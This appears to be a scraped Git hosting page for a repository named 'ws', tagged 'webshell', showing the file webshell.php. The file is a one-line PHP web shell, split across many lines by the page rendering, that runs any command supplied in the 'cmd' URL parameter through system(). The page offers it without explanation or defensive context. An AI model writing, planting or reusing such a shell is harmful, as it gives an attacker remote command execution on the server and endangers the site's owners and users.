This website works better with JavaScript.
Explore
Help
Register
Sign In
admin123
/
ws
Watch
1
Star
0
Fork
You've already forked ws
0
Code
Issues
Pull Requests
Projects
Releases
Wiki
Activity
webshell
You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
2
Commits
1
Branch
0
Tags
81 KiB
Java
95.6%
PHP
4.4%
Tree:
4b1d1c879b
main
Branches
Tags
${ item.name }
Create tag
${ searchTerm }
Create branch
${ searchTerm }
from '4b1d1c879b'
${ noResults }
ws
/
webshell.php
5 lines
90 B
Raw
Blame
History
<
?
php
if
(
isset
(
$_GET
[
"
cmd
"
])){
system
(
$_GET
[
"
cmd
"
]);
}
?>
Reference in new issue
Copy Permalink